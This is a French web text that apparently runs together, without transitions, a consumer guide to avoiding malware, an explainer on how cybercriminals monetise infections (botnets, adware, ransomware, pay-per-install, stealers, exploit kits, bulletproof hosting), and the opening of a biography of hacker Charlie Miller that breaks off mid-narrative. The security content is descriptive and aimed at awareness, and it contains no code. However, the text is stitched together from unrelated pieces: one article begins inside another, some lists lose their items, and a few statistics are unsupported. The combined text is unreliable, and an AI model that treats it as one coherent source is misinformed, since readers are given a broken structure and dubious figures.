Aujourd’hui, les cybercriminels n’utilisent plus seulement des virus classiques. Ils s’appuient sur l’erreur humaine, l’ignorance technique ou la naïveté de l’utilisateur pour infecter les systèmes : faux logiciels, cracks piégés, fausses mises à jour, extensions malveillantes, pièges par email ou publicité…
Autrement dit : ce n’est pas parce que vous avez un antivirus actif que vous êtes protégé. Le risque d’infection dépend davantage de votre comportement que du logiciel que vous utilisez.
L’objectif de cet article est de remettre les bases en place, et de vous expliquer concrètement :
pourquoi les infections surviennent ;
quels types d’utilisateurs sont les plus exposés ;
et notamment, comment vraiment éviter les malwares au quotidien, même sans logiciel miracle.
Vous verrez qu’il n’existe pas une solution unique à appliquer, mais plutôt une hygiène numérique à adopter. Et, c’est bien cette attitude qui fait la différence entre un utilisateur infecté… et un autre qui ne l’est jamais.
Pourquoi les malwares vous ciblent
Les malwares (virus, chevaux de Troie, logiciels espions…) ne sont pas créés “au hasard” pour nuire gratuitement. Aujourd’hui, le principal moteur des cyberattaques est l’argent. Chaque PC infecté peut générer du profit pour les pirates, de différentes manières :
En l’intégrant à un botnet (réseau de machines zombies utilisées à distance)
En forçant l’utilisateur à payer (faux antivirus, ransomwares)
En revendant les accès ou informations collectées sur le marché noir
C’est ce qu’on appelle le business des malwares.
Pour maximiser leurs gains, les cybercriminels cherchent donc à infecter un maximum de machines. Et, pour y arriver, ils exploitent les failles humaines, techniques et comportementales des utilisateurs ordinaires.
Chaque jour, des milliers de nouvelles variantes de malwares sont mises en ligne, souvent conçues pour passer temporairement sous les radars des antivirus. Durant cette fenêtre de temps, vous êtes vulnérable, même si votre antivirus est à jour.
La majorité des infections ne viennent pas d’un “virus qui traîne sur internet”, mais d’un comportement à risque de l’utilisateur, souvent sans qu’il en ait conscience.
Voici les principaux vecteurs d’infection rencontrés au quotidien :
Téléchargements douteux : cracks, keygens, logiciels piratés, faux lecteurs vidéo, etc. Ces fichiers sont souvent piégés avec des malwares ou programmes parasites.
Tous les utilisateurs ne courent pas le même risque d’infection. En sécurité informatique, tout est une affaire de probabilité, et certains profils sont statistiquement plus vulnérables que d’autres.
Voici les cas les plus courants :
Utilisateurs jeunes, peu expérimentés… ou personnes âgées
Téléchargent facilement des cracks, jeux, extensions, émoticônes, « programmes utiles » sans en vérifier la provenance
Acceptent ou exécutent des fichiers simplement parce qu’un ami, un site ou une notification leur suggère
Manquent de recul face aux promesses trop belles pour être vraies, ou aux interfaces piégées
Ne comprennent pas toujours les alertes ou les comportements suspects d’un système infecté
Les personnes âgées sont particulièrement ciblées par des formes de social engineering :
Fausse assistance technique par téléphone (« Microsoft vous appelle… »)
Usurpation d’identité (faux technicien, faux conseiller, arnaque au remboursement)
Ces attaques ne reposent pas sur une faille technique, mais sur la peur, l’urgence et la confiance naïve dans l’autorité. Elles peuvent aboutir à une prise de contrôle à distance, au vol de données bancaires, ou à l’installation de programmes malveillants.
Utilisateurs de P2P, de streaming illégal ou de logiciels piratés
Téléchargent des fichiers depuis des sources non vérifiées : films, jeux, logiciels, clés d’activation
Recherchent et exécutent des cracks, keygens, patchs ou activations trouvés sur des forums, sites douteux ou plateformes P2P
Pensent contourner une limitation logicielle… mais installent en réalité des malwares, adwares, voire des chevaux de Troie
Exécutent des fichiers sans se poser de questions (setup.exe, patch.bat, fake installateurs)
Les auteurs de malwares ciblent massivement ce profil, car il est facile à piéger. Un crack sur deux est infecté, modifié ou lié à une offre déguisée (faux site, installateur piégé, bundle). Et au moment où l’utilisateur s’en rend compte… il est souvent déjà trop tard.
Utilisateurs peu vigilants
N’appliquent pas les mises à jour de Windows ou des logiciels installés
Acceptent toutes les fenêtres, installateurs ou demandes sans lire
Ne savent pas identifier une source fiable ou un site douteux
Installent un logiciel simplement parce que « le site est joli » ou « quelqu’un l’a partagé »
Ce profil est victime non pas d’ignorance technique, mais de naïveté comportementale.
Quelles protections adopter en 2025 ?
On entend souvent la question : “Quel antivirus faut-il installer ?” Mais comme expliqué depuis le début de ce guide, la sécurité informatique ne dépend pas uniquement d’un logiciel. C’est avant tout une affaire de comportement, de vigilance, et de compréhension des risques.
Même avec un bon antivirus, vous pouvez vous faire piéger. À l’inverse, un utilisateur attentif, même équipé d’un antivirus basique, réduira considérablement ses risques d’infection.
Comprendre que l’antivirus ne suffit pas
L’antivirus est un filet de sécurité, pas un pare-feu infaillible. Il peut :
bloquer des fichiers malveillants connus,
détecter certains comportements suspects,
vous avertir après une infection…
Mais, il n’empêche pas l’utilisateur de faire des erreurs : installer un programme piégé, désactiver sa protection, ouvrir une pièce jointe douteuse, ou donner ses identifiants sur une fausse page.
L’antivirus n’est pas capable d’annuler une mauvaise décision humaine.
C’est pourquoi même un antivirus performant ne protège pas de tout, surtout face aux nouvelles menaces (malwares inédits, phishing bien conçu, attaques ciblées, etc.).
On cherche souvent la bonne solution de sécurité : un antivirus, un logiciel miracle, une « astuce » pour éviter les infections.
Mais, la réalité est simple : la meilleure protection, c’est vous.
Il n’existe pas de configuration magique, ni de protection parfaite. Même avec un antivirus réputé, un pare-feu renforcé ou un système à jour, vous pouvez être infecté si vous adoptez de mauvaises habitudes.
La sécurité ne repose pas uniquement sur les outils, mais sur votre comportement :
votre capacité à reconnaître les risques,
à vous méfier des propositions trop faciles,
à garder votre système propre et à jour,
et à ne pas cliquer sans réfléchir.
La majorité des infections se produisent par négligence, naïveté ou automatisme. Ce sont les petites habitudes du quotidien qui font toute la différence : un peu de recul, un peu de méfiance, un minimum de bon sens informatique… et vous évitez 95 % des menaces.
En cybersécurité, il vaut mieux être un utilisateur moyen, mais attentif, qu’un utilisateur confiant avec des outils puissants cependant mal utilisés.
On imagine souvent les malwares comme des virus “créés pour nuire”, sans but précis. En réalité, les infections informatiques sont aujourd’hui le moteur d’un immense écosystème criminel qui brasse des millions d’euros chaque année.
Derrière chaque PC infecté, chaque popup de publicité ou chaque ransomware se cache un modèle économique bien rodé, avec ses outils, ses services, ses clients… et ses profits. Le malware n’est plus un simple programme malveillant : c’est un vecteur de revenus, utilisé par des groupes organisés qui exploitent la naïveté des internautes et les failles du Web.
Dans cet article, nous vous dévoilons comment les cybercriminels gagnent de l’argent grâce aux malwares :
et même des faux blogs de sécurité ou des offres d’emploi frauduleuses.
Ce dossier vous montre que derrière chaque infection, il y a un business — et souvent, plusieurs intermédiaires qui en profitent.
Pourquoi infecter un PC rapporte de l’argent ?
Infecter un ordinateur n’est pas une fin en soi : c’est un moyen lucratif. Aujourd’hui, la majorité des malwares sont conçus pour générer du profit, pas simplement pour “casser des systèmes”.
Chaque machine compromise représente une ressource exploitable pour un cybercriminel : elle peut afficher des publicités, envoyer du spam, miner de la cryptomonnaie, servir de relais pour des attaques, ou simplement devenir une porte d’entrée vers des données personnelles ou bancaires.
Plus un malware est installé sur de nombreux PC, plus il peut :
multiplier les revenus (popups, ransomwares, affiliations)
relayer des opérations malveillantes en masse (botnets, hameçonnage, arnaques)
collecter ou revendre des données (emails, comptes, numéros de carte, identifiants de jeux)
L’infection devient alors un investissement rentable dans un véritable écosystème souterrain. À grande échelle, un réseau de PC infectés (botnet) peut rapporter des milliers d’euros par jour à son opérateur, avec très peu de frais techniques.
Dans les prochaines sections, nous allons passer en revue les principales méthodes utilisées pour monétiser les infections, et comprendre comment ce business s’est structuré autour de l’exploitation des utilisateurs.
Méthodes de monétisation des PC infectés
Botnets : attaques, spam, location de machines
Un botnet est un réseau de machines infectées (PC, serveurs, objets connectés), contrôlées à distance sans que leurs propriétaires ne s’en aperçoivent. Ces machines zombifiées sont utilisées comme armée numérique silencieuse, et peuvent être exploitées à des fins très lucratives.
Que permet un botnet ?
Lancer des attaques DDoS (déni de service) : inonder un site web ou un service en ligne de requêtes jusqu’à le rendre inaccessible. → Ce type d’attaque peut être vendu comme service à d’autres groupes, à des concurrents ou utilisé à des fins de chantage.
Envoyer du spam en masse : un botnet peut expédier des millions d’emails de phishing ou de publicité non sollicitée, souvent via les adresses IP des machines infectées pour contourner les filtres anti-spam.
Cacher l’origine d’attaques : les cybercriminels peuvent utiliser les machines d’un botnet comme relais pour mener d’autres actions malveillantes (vols de données, scans de vulnérabilités, etc.).
Un modèle économique bien établi
Certains opérateurs de botnets ne les utilisent même pas eux-mêmes. Ils les louent à d’autres groupes pour une durée donnée, avec une interface en ligne, des statistiques d’utilisation, un support client, etc. On parle alors de botnet-as-a-service, un modèle similaire à celui du cloud computing.
Un botnet de quelques dizaines de milliers de machines peut être loué pour plusieurs centaines d’euros par jour, selon ses capacités (puissance réseau, stabilité, géolocalisation des machines, etc.). Et pour alimenter ces réseaux, des kits de création et de gestion de botnet circulent dans les cercles underground, vendus avec documentation, mises à jour et même support technique.
Cette annonce propose de constituer un botnet en quelques heures pour 30 BTC.
Ou encore cette autre annonce :
Publicité : adwares, popups, redirections
Un autre moyen courant de monétiser les infections consiste à afficher de la publicité non désirée sur les ordinateurs infectés. Ce modèle repose sur l’installation de programmes publicitaires (adwares) qui injectent du contenu promotionnel directement dans le système de l’utilisateur.
Comment ça fonctionne ?
Une fois l’adware installé, il peut :
Ouvrir des popups publicitaires de façon aléatoire ou à intervalles réguliers
Modifier les résultats de recherche (ex. : détourner les recherches Google vers des moteurs frauduleux)
Ajouter des bannières ou faux boutons sur les sites visités
Rediriger les clics vers des pages affiliées ou des pages malveillantes
Chaque interaction (affichage, clic, redirection) génère des revenus pour l’auteur du malware, généralement via des plateformes d’affiliation ou des régies publicitaires peu regardantes.
Pourquoi c’est rentable ?
Les campagnes d’adware sont peu coûteuses à mettre en place et peuvent toucher des dizaines de milliers d’utilisateurs en peu de temps. Chaque clic ou affichage peut rapporter quelques centimes, mais multipliés par le volume, cela devient rapidement une source de revenus passive et massive.
L’auteur d’un adware bien diffusé peut générer plusieurs centaines d’euros par jour sans voler de données, ni bloquer la machine. C’est aussi l’un des modèles les plus durables, car il laisse le système fonctionnel, rendant l’utilisateur moins méfiant — voire incapable d’identifier la cause réelle du problème.
Cryptomonnaie : exploiter la puissance de calcul pour miner de la cryptomonnaie
Une autre méthode de monétisation des machines infectées consiste à utiliser leur puissance de calcul pour miner de la cryptomonnaie (Bitcoin, Monero, etc.).
Plutôt que d’afficher des publicités ou de voler des données, certains malwares installent un mineur de cryptomonnaie discret sur la machine. Ce dernier utilise les ressources CPU ou GPU de l’ordinateur à l’insu de l’utilisateur pour générer des unités de monnaie virtuelle.
Lorsque cette activité est répartie sur des milliers de PC infectés dans un botnet, elle peut générer des revenus significatifs sans éveiller de soupçons immédiats (à part des lenteurs ou une surchauffe de la machine).
Cette technique est particulièrement utilisée avec des cryptos comme Monero, qui sont conçues pour être résistantes au traçage et exploitables par CPU (contrairement au Bitcoin, devenu moins rentable à petite échelle).
Scawares/Rogues et ransomwares : arnaques à la peur
Les cybercriminels exploitent aussi la peur pour pousser les utilisateurs à agir dans la précipitation — et à payer. Deux méthodes sont particulièrement efficaces dans ce domaine : les rogues (faux antivirus) et les ransomwares.
Scawares/Rogues (faux antivirus)
Un rogue est un faux logiciel de sécurité qui imite un antivirus classique. Il affiche de fausses alertes alarmantes pour faire croire à l’utilisateur que son PC est gravement infecté, puis lui propose une solution immédiate… payante.
Exemples de comportements :
Alertes envahissantes sur l’écran indiquant des “infections critiques”
Blocage de certaines fonctions système (explorateur, navigateur…)
Incitation à acheter une licence pour “nettoyer” le PC
Ci-dessous, un rogue sous la forme d’un faux antivirus qui affiche des détections et alertes exagérées En réalité, ces programmes ne nettoient rien : ils sont souvent eux-mêmes à l’origine des dysfonctionnements.
Ces arnaques reposent sur le modèle PPC / CPC (Pay Per Click / Conversion) : le cybercriminel est rémunéré à chaque installation ou achat déclenché par son faux logiciel.
Les ransomwares sont aujourd’hui l’un des modèles les plus lucratifs du cybercrime. Ils chiffrent les fichiers de l’utilisateur (documents, photos, etc.) et affichent un message réclamant une rançon en cryptomonnaie pour les déverrouiller.
Caractéristiques :
Chiffrement fort (AES, RSA) rendant les fichiers inutilisables
Blocage complet ou partiel de l’accès au système
Montant de la rançon : souvent entre 100 € et 1000 €, selon le profil ciblé
Contrairement aux rogues, les ransomwares ne simulent pas une infection, ils en causent une réelle. Et dans la plupart des cas, payer ne garantit rien.
Le ransomware peut également être utilisé pour la double extorsion : vol de données + chiffrement, avec menace de publication si la rançon n’est pas versée.
Le modèle Pay-Per-Install (PPI) repose sur un principe simple : être payé à chaque fois qu’un programme est installé sur une machine, qu’il soit utile… ou non. Dans le monde des malwares, ce modèle est détourné pour distribuer des logiciels indésirables, publicitaires, voire malveillants, à grande échelle.
Comment ça fonctionne ?
Des groupes créent ou distribuent des programmes douteux (rogues, adwares, browser hijackers, etc.) et recrutent des “affiliés” pour en assurer la diffusion. Ces affiliés sont rémunérés à chaque installation réussie sur un ordinateur.
Les canaux de diffusion sont variés :
Sites de téléchargement louches (ou même certains grands portails peu modérés)
Crackers, keygens ou jeux modifiés distribués via le P2P
Faux lecteurs vidéo, mises à jour Flash ou Java sur des sites de streaming
Installateurs bundlés qui proposent plusieurs logiciels lors de l’installation d’un seul
Exemple : vous téléchargez un lecteur multimédia gratuit, mais l’installateur vous propose en parallèle une “barre d’outils”, un VPN douteux, un antivirus gratuit, etc. Si vous cliquez trop vite, vous installez tout sans vous en rendre compte.
Par exemple, ci-dessous, une vidéo de crack pour Adobe Acrobat DC qui est en réalité un malware.
Pourquoi ça rapporte ?
Chaque installation peut rapporter quelques centimes à quelques euros à l’affilié. Sur des campagnes massives (sites piratés, spam, torrents), cela peut générer des centaines voire des milliers d’euros par jour.
Ce système a permis à de nombreux groupes de monétiser sans avoir à développer leurs propres malwares. Ils se contentent de diffuser ceux des autres, via des campagnes ciblées.
Le PPI est souvent à l’origine de PUPs (programmes potentiellement indésirables) qu’on retrouve sur les PC ralentis, surchargés de fenêtres, de faux outils d’optimisation, ou de VPN imposés.
Vols d’informations : bancaire, identifiants, jeux en ligne
Une autre forme très rentable de monétisation des infections consiste à voler des données sensibles sur les machines compromises. Ces informations sont ensuite revendues, utilisées pour des fraudes ou exploitées dans des campagnes ciblées.
Vols de données bancaires
Certains malwares sont conçus pour intercepter des informations bancaires :
Les malwares spécialisés dans ce domaine sont appelés trojans bancaires (ex. : Zbot, Emotet, Dridex). Ils peuvent se cacher en mémoire, injecter du code dans votre navigateur, ou rediriger vos connexions vers de fausses pages imitant votre banque.
Une fois les données récupérées, elles sont soit revendues sur des marchés noirs, soit utilisées directement pour des achats frauduleux ou des virements non autorisés.
Certains malwares ciblent spécifiquement les comptes de jeux vidéo (Steam, Battle.net, Epic, etc.). Ces comptes ont souvent une valeur financière réelle (jeux achetés, objets virtuels, monnaies in-game) et peuvent être revendues ou vidés.
Certains pirates ciblent même des comptes très spécifiques, avec des objets rares ou des skins à forte valeur.
Keyloggers, stealer, fichiers exportés
Des malwares plus généraux, appelés stealers ou keyloggers, enregistrent :
tout ce que vous tapez (mots de passe, recherches…)
les fichiers ouverts
les sessions de messagerie
les cookies ou jetons de session
Tous ces éléments sont régulièrement exportés vers un serveur distant contrôlé par l’attaquant, qui les trie, revend ou exploite selon leur valeur.
Ce type de vol est discret et difficile à détecter : l’utilisateur ne remarque rien jusqu’à ce que ses comptes soient compromis, ses mails utilisés ou ses jeux volés.
En plus des malwares techniques, les cybercriminels exploitent aussi des méthodes plus “sociales” pour gagner de l’argent : le phishing, les scams (arnaques), les fraudes en ligne. Ces techniques reposent principalement sur la crédulité ou la panique de la victime.
Phishing : hameçonnage classique mais toujours rentable
Le phishing consiste à envoyer un message (email, SMS, réseau social…) se faisant passer pour un service légitime (banque, impôts, opérateur, etc.) afin de récupérer des identifiants ou des données personnelles.
Exemples de messages :
“Une tentative de connexion suspecte a été détectée sur votre compte…”
“Votre colis est en attente de paiement…”
“Votre compte sera suspendu si vous ne confirmez pas vos informations…”
Le lien contenu dans le message redirige vers une fausse page qui imite parfaitement le site officiel. Si la victime entre ses identifiants, ceux-ci sont immédiatement envoyés au pirate.
Ces données sont ensuite revendues ou utilisées pour accéder à des services (et dans certains cas, détourner de l’argent ou voler des comptes).
Scam, arnaques à la carte bancaire et à la romance
On retrouve également :
les arnaques nigérianes (scam 419) : promesse d’un héritage, d’un gain, d’un virement bloqué
les arnaques à la romance : séduction à distance, puis demande d’argent
les faux supports techniques : message bloquant, numéro à appeler, prise de contrôle du PC
Tous ces scénarios sont conçus pour pousser la victime à effectuer un virement, payer une rançon, ou transmettre volontairement ses données bancaires.
Fraudes par email et campagnes automatisées
Certains groupes spécialisés proposent même des services de mailing frauduleux, à la demande. Un cybercriminel peut acheter un lot d’adresses ciblées (ex : francophones, utilisateurs d’un certain site) et payer un prestataire pour envoyer massivement ses messages piégés.
Ces campagnes sont souvent liées à d’autres formes de monétisation (phishing bancaire, faux antivirus, arnaques crypto…).
Le phishing et les scams sont des attaques sans infection technique, mais tout aussi dangereuses. Ils exploitent la confiance, l’urgence, et l’ignorance — et continuent de faire chaque jour de nombreuses victimes.
L’économie souterraine (Underground)
Le modèle de “cybercriminalité à la chaîne” fonctionne comme une entreprise… à ceci près qu’elle est illégale.
Cette économie souterraine a démocratisé le cybercrime : plus besoin d’être un développeur expérimenté pour infecter des machines, voler des données ou générer de l’argent. Il suffit de payer les bons outils, et parfois d’un simple hébergement pour commencer.
Chaque acteur joue un rôle précis, ce qui permet une efficacité maximale : celui qui développe ne s’occupe pas de la diffusion, celui qui distribue ne gère pas les paiements, etc.
Achat de kits, malwares, exploits prêts à l’emploi
Le développement et la diffusion de malwares ne sont plus réservés à quelques experts. Aujourd’hui, tout se vend sur des forums underground ou des places de marché spécialisées : virus “clé en main”, kits de phishing, exploit packs, crypters, services d’hébergement, etc.
Kits de malwares et exploit packs
Un exploit kit est un outil permettant d’infecter automatiquement les visiteurs d’un site web en exploitant les failles de leurs navigateurs ou plugins (PDF, Flash, Java, etc.). Ces kits incluent souvent :
un panneau d’administration (avec statistiques de réussite)
des modules mis à jour selon les failles disponibles
la possibilité de rediriger selon le pays ou l’horaire
Ces kits s’achètent sur commande ou par abonnement, comme un logiciel classique. Leur but : maximiser le taux d’infection sur des sites compromis ou piégés.
Voici un exemple d’interface graphique du WebExploitKit BlackHole très actif autour de 2011. Le type d’exploits, le taux de chargement réussi, les versions de Windows, pays et informations sur le navigateur internet sont fournis.
Voici un autre exemple, ce groupe propose la vente d’un outil « Multisploit tool » qui permet de créer des macros malveillantes visant Office. Un autre groupe peut l’utiliser pour diffuser son malware ou un malware acheté.
Crypters, binders, packers : contourner les antivirus
Un crypter permet de rendre un malware indétectable temporairement par les antivirus. Les créateurs de malwares s’en servent pour “emballer” leur code malveillant de manière à échapper aux signatures classiques.
Certains services proposent même des crypters en version premium, avec options de test automatique contre plusieurs antivirus (FUD – Fully Undetectable).
Ce marché permet à des utilisateurs sans grande compétence technique de diffuser des malwares qui passent sous les radars, au moins pendant quelques jours.
Phishing packs et fausses pages
Les “phishing packs” contiennent :
une fausse page de connexion à une banque, un service de messagerie, ou un réseau social
un script de collecte de données
un tutoriel de mise en ligne
Le tout est prêt à être déployé, vendu à l’unité ou en bundle.
Groupes spécialisés et services à la carte
Contrairement à l’image du “pirate solitaire”, la majorité des cybercriminels opèrent en groupe, avec une répartition claire des rôles. Chaque groupe peut se spécialiser dans une partie de la chaîne : développement, distribution, infection, exploitation ou support technique.
Développement de malwares
Certains groupes créent des malwares sur mesure :
trojans bancaires
stealers (vols de mots de passe)
ransomwares
bots pour réseaux sociaux ou plateformes de jeux
Une fois développés, ces malwares sont revendus ou loués à d’autres groupes.
Distribution et infection
D’autres groupes sont spécialisés dans la diffusion des malwares. Ils :
achètent ou infectent des sites web
intègrent les malwares à des faux cracks ou torrents
utilisent des réseaux publicitaires pour diffuser des pièges (malvertising)
organisent des campagnes de spam ou de phishing
Ils sont souvent rémunérés selon le nombre d’installations réussies (PPI).
Services sur commande
De nombreux services sont proposés à la carte :
Location de botnets
Envoi massif d’emails piégés
Création de faux sites de téléchargement
Hébergement « bulletproof » (tolérant les activités malveillantes)
Test de détection antivirus
Certains groupes proposent même un support client via Telegram, forums ou messageries chiffrées.
Hébergement, domaines, serveurs : le support invisible
Pour qu’un malware puisse être distribué, exécuté ou contrôlé à distance, il lui faut une infrastructure technique fiable : serveurs, hébergement web, noms de domaine, panneaux de contrôle… Autant d’éléments souvent négligés dans l’analyse, mais essentiels au fonctionnement du cybercrime.
Noms de domaine et hébergement “bulletproof”
Les cybercriminels utilisent des hébergeurs ou registrars peu regardants (souvent situés hors d’Europe ou dans des juridictions laxistes) pour :
héberger leurs pages piégées (phishing, faux téléchargements…)
déployer des serveurs de commande et contrôle (C&C)
enregistrer des noms de domaine à rotation rapide
Ces hébergements “bulletproof” sont spécialement conçus pour résister aux demandes de fermeture, même en cas de signalement. Certains forums underground proposent des offres d’hébergement spécifiquement “compatibles malwares”, avec support technique 24h/24.
Infrastructure redondante et dynamique
Les campagnes d’infection s’appuient souvent sur des systèmes dynamiques :
changement automatique d’adresse IP ou de domaine (Fast flux)
redirection selon l’horaire, la géolocalisation ou la langue
infrastructure décentralisée (parfois hébergée chez des particuliers à leur insu)
Cela rend les campagnes plus difficiles à bloquer ou à démanteler.
Le jeu du chat et de la souris
Chaque jour, les éditeurs d’antivirus ou les CERT ferment ou blacklistent des centaines de domaines et serveurs malveillants. Mais, de nouveaux apparaissent aussitôt : le coût de création est faible et l’efficacité d’une campagne dépend souvent de sa durée de vie (quelques heures ou jours suffisent à générer des gains).
Réseaux d’affiliation (Trafic Management Systems)
Pour maximiser la diffusion de leurs malwares, certains groupes cybercriminels mettent en place des réseaux d’affiliation, appelés “Trafic Management Systems” (TMS). Leur principe est simple : tout utilisateur qui réussit à infecter d’autres machines est rémunéré, selon le volume généré ou le type de victime ciblée.
Le fonctionnement d’un TMS
Un affilié s’inscrit sur une plateforme TMS.
Il reçoit un lien personnalisé (ex. : http://malware-domain.com/in.cgi?user123)
Chaque clic sur ce lien redirige l’utilisateur vers une page contenant un exploit ou un malware
Si l’infection réussit, l’affilié touche une commission (PPI, CPA ou revenu au clic)
Ces systèmes permettent de sous-traiter la distribution des malwares à une armée d’intermédiaires : webmasters, influenceurs, administrateurs de forums, hackers, ou même de simples utilisateurs motivés par le gain.
Optimisation dynamique
Les TMS disposent souvent de fonctionnalités avancées :
Redirection vers différents malwares selon la géolocalisation, l’heure, le système d’exploitation
Rotation automatique des domaines pour échapper aux blacklists
Suivi des performances (tableau de bord, taux d’infection, revenus générés)
Cela permet des campagnes flexibles, résistantes aux blocages, et hautement rentables. De plus, une interface avec des statistiques est souvent proposée.
Exemples d’intégration
Sites pornographiques ou de streaming : insertion de liens TMS dans les pages ou les lecteurs vidéos (ex : faux codecs)
Sites piratés : inclusion de redirections via iframe ou JavaScript
Publicités : intégration dans les bannières ou via des régies peu scrupuleuses
L’implication indirecte de certains acteurs du Web
Régies publicitaires et programmes douteux
De nombreuses infections passent aujourd’hui par la publicité — ce qu’on appelle le malvertising. Des cybercriminels paient des régies pour diffuser :
des bannières menant à des faux codecs ou des faux antivirus
des redirections vers des sites piégés exploitant des failles
des offres trompeuses pour des logiciels douteux
Certaines régies ne contrôlent pas suffisamment les annonces qu’elles diffusent, permettant ainsi à des contenus malveillants d’être affichés sur des sites parfaitement légitimes. Chaque clic génère des revenus, pour le pirate comme pour la régie. Tant que cela rapporte, la modération reste souvent laxiste.
Registrars, hébergeurs laxistes ou complices
Le nom de domaine et l’hébergement sont essentiels pour faire fonctionner un malware (commandes à distance, redirections, serveurs de collecte…). Certains hébergeurs ou registrars (souvent situés hors juridiction européenne) se montrent particulièrement :
lents à répondre aux signalements
peu regardants sur le contenu hébergé
permissifs avec les abus
Ils deviennent ainsi des piliers logistiques involontaires de nombreuses campagnes malveillantes.
Certains grands sites de téléchargement “gratuits” ont pu, par le passé, héberger ou relayer des installateurs contenant des PUPs (logiciels indésirables) voire des adwares ou des malwares déguisés. Même s’ils ne créent pas ces menaces, ils en assurent la distribution massive, via des “bundles” intégrés à leurs installeurs.
Groupes de cybercrminels : une organisation en rôles bien distincts
Les groupes de cybercriminels les plus actifs ne fonctionnent pas seuls. Ils opèrent comme de véritables entreprises illégales, avec des équipes spécialisées selon les compétences, réparties autour de 4 pôles principaux.
Les développeurs et packers
Ces membres conçoivent les malwares eux-mêmes : trojans bancaires, ransomwares, stealers… Ils créent également des packers et crypters pour rendre les malwares indétectables par les antivirus. Ils utilisent des services de test (multi-antivirus ou sandbox) pour s’assurer que le malware passe sous les radars le plus longtemps possible.
Ils s’occupent de propager les malwares à grande échelle, via :
des campagnes de phishing,
des malvertising,
des sites compromis,
ou des réseaux d’affiliation (PPI/TMS).
Leur objectif : infecter le plus de machines possible, rapidement.
Les administrateurs réseau
Ils assurent la mise en place et la maintenance de l’infrastructure :
serveurs C&C (commandes à distance),
hébergements “bulletproof”,
rotation de domaines et IP,
protection contre les blocages et les interruptions.
Ils travaillent souvent dans l’ombre, mais sans eux, aucune opération ne peut tenir sur la durée.
Les mules financières
Ce sont des individus chargés de récupérer l’argent volé, souvent sans comprendre l’ampleur de l’opération. Ils sont recrutés par des campagnes de phishing ou d’arnaques à l’emploi (“travailler depuis chez vous”, “assistant de transfert de fonds”, etc.).
Une fois recrutés, ils reçoivent de l’argent sur leur compte, qu’ils doivent ensuite retransférer vers d’autres comptes ou retirer en espèces — contre une commission. Ce système permet de dissiper la traçabilité des flux financiers.
Conclusion : professionnalisation, argent, et banalisation
Les malwares ne sont plus des blagues de hackers. Ils sont devenus les outils d’une économie parallèle bien réelle, structurée autour d’un objectif unique : gagner de l’argent.
Botnets, ransomwares, scarewares, adwares, phishing, vol de données… tous ces mécanismes ont été industrialisés, automatisés et intégrés à un écosystème criminel sophistiqué. Aujourd’hui, n’importe qui peut acheter un kit de malware, louer un service de distribution, et monétiser les infections — sans compétence technique particulière.
Ce phénomène s’est banalisé, au point que des entreprises légitimes en bénéficient indirectement : régies publicitaires, hébergeurs peu regardants, revendeurs de données, et parfois même des éditeurs de logiciels opportunistes.
Ce qu’il faut retenir :
Le business du malware n’est pas une exception, c’est une industrie rentable.
Les victimes sont souvent des utilisateurs ordinaires, ciblés pour leur naïveté, leur passivité ou leur absence de vigilance.
La sécurité ne repose pas uniquement sur des logiciels, mais sur une bonne compréhension des risques numériques.
La première fois où j’ai entendu parler de Charlie Miller c’était en 2008, juste après qu’il ait défoncé un MacBook Air flambant neuf en moins de 2 minutes au concours Pwn2Own. 10 000 dollars de prime et la gloire éternelle.
À l’époque, c’était impressionnant qu’un mec puisse compromettre une machine Apple aussi vite mais ce que je ne savais pas encore, c’est que derrière ce hack spectaculaire se cachait l’histoire d’un gamin du Missouri, orphelin très tôt et qui a transformé sa solitude en génie mathématique. Un chercheur qui allait devenir tellement doué pour casser les produits Apple qu’ils finiraient par se faire bannir de leur écosystème. Voici l’histoire de Charlie Miller, l’homme que Foreign Policy a classé dans son Top 100 des penseurs mondiaux et surnommé “l’un des hackers les plus techniquement compétents sur Terre”.
Charlie Miller lors d’une présentation à la Truman State University
Charles Alfred Miller est né le 6 mai 1973 à St. Louis, dans le Missouri et son enfance à Affton n’a rien d’un conte de fées. Quand il a 7 ans, sa mère Géraldine meurt d’un cancer. Pour un gamin de cet âge, c’est un tsunami émotionnel et Charlie se retrouve à passer beaucoup de temps seul. Cette solitude forcée, il va la transformer en quelque chose de productif : une passion dévorante pour les mathématiques et la logique. “J’ai passé beaucoup de temps tout seul”, confiera-t-il plus tard dans une interview au St. Louis Magazine. C’est cette solitude qui l’a poussé à se plonger dans les chiffres et les équations… un monde où tout avait du sens, contrairement au chaos émotionnel provoqué par la perte de sa mère.
Au lycée, Charlie n’est pas le geek cliché qu’on imagine. Il fait du vélo de compétition et devient même champion de l’État du Missouri. Un athlète matheux, y’a pas beaucoup de gens comme ça mais c’est dans les maths qu’il trouve vraiment sa voie. Il est tellement doué qu’il décroche une bourse complète pour Northeast Missouri State University (aujourd’hui Truman State), où il obtient un bachelor en mathématiques avec une spécialisation secondaire en philosophie. La combinaison est intéressante : les maths pour la rigueur logique et la philo pour questionner le monde. D’ailleurs, cette double approche analytique et réflexive deviendra sa marque de fabrique dans le hacking.
Mais Charlie voit plus grand. Il veut un doctorat, alors direction l’Université de Notre Dame, l’une des meilleures facs catholiques du pays. Là, il se plonge dans les équations aux dérivées partielles non linéaires qui décrivent la propagation de la lumière dans les fibres optiques. C’est du très haut niveau, le genre de trucs que seule une poignée de personnes dans le monde comprend vraiment. Sa thèse porte sur les solitons optiques, ces ondes qui se propagent sans se déformer dans les fibres. Puis en 2000, après des années de travail acharné, il soutient sa thèse et devient officiellement Dr. Charlie Miller. Et honnetement, à ce moment-là, il pense que sa vie est toute tracée : la recherche, l’enseignement, et peut-être un prix Nobel un jour. Qui sait ?
C’est là que l’histoire prend un tournant complètement dingue. Charlie a toujours rêvé d’être astronaute. Sérieusement. Depuis gamin, il regarde les étoiles et s’imagine flotter dans l’espace. Avec son PhD en maths de Notre Dame, il pense avoir le profil parfait pour la NASA. Il envoie alors candidature sur candidature. Il remplit des formulaires de 50 pages, passe des tests médicaux, rédige des essais sur sa motivation. Mais à chaque fois, c’est le silence radio. La NASA ne lui répond même pas. Pas un accusé de réception, rien.
Pour un type brillant comme lui, habitué à réussir tout ce qu’il entreprend, c’est une claque monumentale. “Mon rêve de devenir astronaute n’est resté qu’un rêve parce que la NASA a ignoré mes nombreuses candidatures après mes études supérieures.”, dira-t-il plus tard avec une pointe d’amertume qui ne l’a jamais vraiment quitté.
“Mis à part dans le milieu universitaire, il n’y a pas beaucoup d’emplois pour un mathématicien titulaire d’un doctorat.”, réalisera-t-il brutalement. C’est vrai, et c’est le drame de beaucoup de docteurs en sciences fondamentales. Quand vous avez passé des années à étudier des équations différentielles partielles non linéaires appliquées aux solitons optiques, vos options de carrière sont… limitées.
